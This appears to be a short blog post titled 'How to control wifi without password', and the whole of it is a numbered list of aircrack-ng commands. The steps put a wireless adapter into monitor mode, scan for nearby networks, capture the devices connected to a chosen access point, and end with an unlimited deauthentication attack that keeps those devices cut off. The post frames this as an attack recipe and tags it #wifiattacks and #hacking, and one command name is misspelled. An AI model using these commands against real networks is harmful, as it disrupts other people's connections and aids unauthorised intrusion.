How to control wifi without password

Commands                         Description 
1.iwconfig - check the wired and wireless connection and adapters.

2.airmon-ng start wlan0/eth0 - Enables monitor mode
3.airplay-ng --test wlan0mon - Identifying Injection is working.
4.airodump-ng wlan0mon - shows wifi ssid/network lists.
5.Requirements - Mac ID,Channel No.&BSSID.
6.Open a New Terminal and write the command - 7.sudo airodump-ng --bssid 73:X:X:X:X:X -c 11 -w capture wlan0mon - You will get the list of connected devices
8.aireplay-ng --help
9.sudo aireplay-ng --deauth 0 -a Mac address -c Station wlan0mon
Terms
Station meaning Mac address.
-w means write 

#wifi #wifiattacks #wifiattacking#wificontrolling #hacking #ethicalhacking

Comments

Popular posts from this blog

"Colorful Command Line: How to Add lolcat to Your Linux Commands"

How to create a fake access point in kali linux

How to change resolution in hyper-v kali linux #kalilinux #kali #hyperv #virtualenvironment